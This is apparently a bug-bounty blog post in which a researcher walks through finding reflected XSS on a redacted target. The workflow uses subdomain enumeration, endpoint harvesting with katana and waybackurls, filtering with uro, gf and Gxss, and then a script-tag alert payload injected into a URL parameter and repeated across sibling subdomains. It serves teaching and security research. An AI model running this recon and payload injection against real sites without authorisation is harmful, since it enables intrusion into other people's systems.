How i got easy multiple RXSS

السلام عليكم

Assalamualaikum , guys! my name is Abdelrahem mekky (0xmekky) I have found multiple Reflected XSS vulnerabilities

If you do not know what xss is, you can understand it here

Let’s explain how I found multiple RXSS vulnerabilities

1-After extracting and collecting the subdomains using the SubEnum tool

subenum -d target.com -r 

After the tool finishes, you will save the output in a file subdomians.txt

2- Now Let’s Gather the endpoints from Wayback Machine and Common Crawl

I will use the katana tool and Wayback machine

cat subdomians.txt | katana -jc >> Endpoints.txt

cat subdomians.txt | waybackurls >> Endpoints.txt

3-Because most of them would be duplicated, we would get rid of them with uro tool

cat Enpoints.txt | uro >> Endpoints_Final.txt

4- getting the endpoints that have parameters which maybe vulnerable to XSS using gf tool

cat Endpoints_Final.txt | gf xss >> XSS.txt

5-Then we will use the Gxss tool for finding parameters whose values are reflected in the response

cat XSS.txt | Gxss -p khXSS -o XSS_Reflected.txt

After finding the parameter values are reflected in the response

6-Let’s get started with Manual Testing

https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14

As you can see, I distinguish each parameter with a distinct word in order to know and confirm which one will work, which is reflected in the source code.

As you can see, there is only one parameter that may be reflected in the source code

7-You can inject any JavaScript payload and it will execute e.g

JavaScript payload :- mekky2><script>alert("0xmekky")</script>

URL :-https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14

booooooooooom

As you can see here, the entire payload is in the source code, which means that there is no filter or waf

8-I noticed in the SubDomains file that there are many SubDomains for SubSubDomain

e.g.

SubSubDomaine :- subsub.test.exap.com

SubDomains for SubSubDomain :- 
1-  new.subsub.test.exap.com 
2-  new2.subsub.test.exap.com
3-  new3.subsub.test.exap.com
etc.........................................

9-Filter the file and search for a specific value to extract everything underneath subsub.test.exap.com using grep

cat subdomians.txt | grep "subsub.test.exap.com" 

The result 
new.subsub.test.exap.com 
new2.subsub.test.exap.com
new3.subsub.test.exap.com

I also noticed that it is the same page as subsub.test.exap.com

10-After collecting the subdomains as above

new.subsub.test.exap.com 
new2.subsub.test.exap.com
new3.subsub.test.exap.com

I tried adding Endpoint to all subdomains

new.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14 
new2.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
new3.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14

The payload has been successfully executed in subdomains